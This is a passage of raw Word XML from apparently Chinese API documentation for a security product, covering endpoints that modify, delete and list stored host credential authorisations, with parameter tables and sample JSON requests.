        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5684E315" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17CC2309" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39C38817" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D48AB5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07E2831A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>原授权id，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="54BEAEE7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D68D8A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A4C43FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AD8A856" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0C85A2A0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3248AE95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="295E5BBA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23F1C0FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>存放token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="14349A59" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DBC7923" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>modifyPassword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42802994" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49C7E1F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>当修改密码时，需指定</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>modifyPassword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>＝true,其他情况可默认不填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41120519" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5A75D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,  //1：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>； 2：windows， 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,  //主机范围，1：自定义，包括业务组、主机； 0：全部主机， 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groups": [1],  //业务组列表，如果</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1, 则</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>和groups至少有一个不为空</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["xx1", "xx2"],  //主机列表，如果</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1, 则</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>和groups至少有一个不为空</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "MySQL",  //应用名, 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "admin",  //用户名, 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "password": "admin",  //密码</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5ceb46b97d761b0bd9c44314",  //原授权id，必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "port": 3306,  //端口</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "params": {      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "1da285b0062c4b0ca56f24dfce25b7f8",  //授权token，由前端传入，必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }，</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　 "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>modifyPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08675FD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D4B7DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    true/false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9E5D51"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7CCF787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56EE9F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B113E6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F94DC2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7478201A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E4E8B49" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66423FC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="169530A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F747071" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="371" w:name="_Toc115166258"/>
      <w:bookmarkStart w:id="372" w:name="删除授权请求"/>
      <w:bookmarkEnd w:id="370"/>
      <w:r>
        <w:t>删除授权请求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="371"/>
    </w:p>
    <w:p w14:paraId="710A8793" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFFFB27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/auth/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6652DE9B"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44"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="3139"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7FAAE38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432DF8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EB674F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38B12A27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EA610EE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59E75ED9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C2E9CA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="433C62C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F75EE79" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43E473D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E3D0933" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7696BA4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="51428B8D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A4A4AFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F2B73C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51053EAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>； 2：windows， 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B719C79" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00F0811C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2595BD54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C8D1528" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id列表， 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="062DEABC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="608CB6A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1147352E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73CFCE65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>存放token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A92F375" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62929C14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,  //1：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>； 2：windows， 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ids": ["5a18eaab3171a748ec593837"],  //id列表， 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "params": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "1da285b0062c4b0ca56f24dfce25b7f8",  //授权token，由前端传入，必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7A9D88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FA4452" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    true/false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431BD66E"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1063AA3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DFE0F3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="369B1909" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="771C367F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="13F42C32" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A86A2A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A19C45D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="498F27BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="195025ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="373" w:name="_Toc115166259"/>
      <w:bookmarkStart w:id="374" w:name="查询授权请求"/>
      <w:bookmarkEnd w:id="372"/>
      <w:r>
        <w:t>查询授权请求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="373"/>
    </w:p>
    <w:p w14:paraId="32CBAB92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A81DBE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/auth/list/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DDFAEA"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224"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="2964"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0E4AF4C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8EFE695" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="366DBA78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A976D5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F7FC052" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C9D6363" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
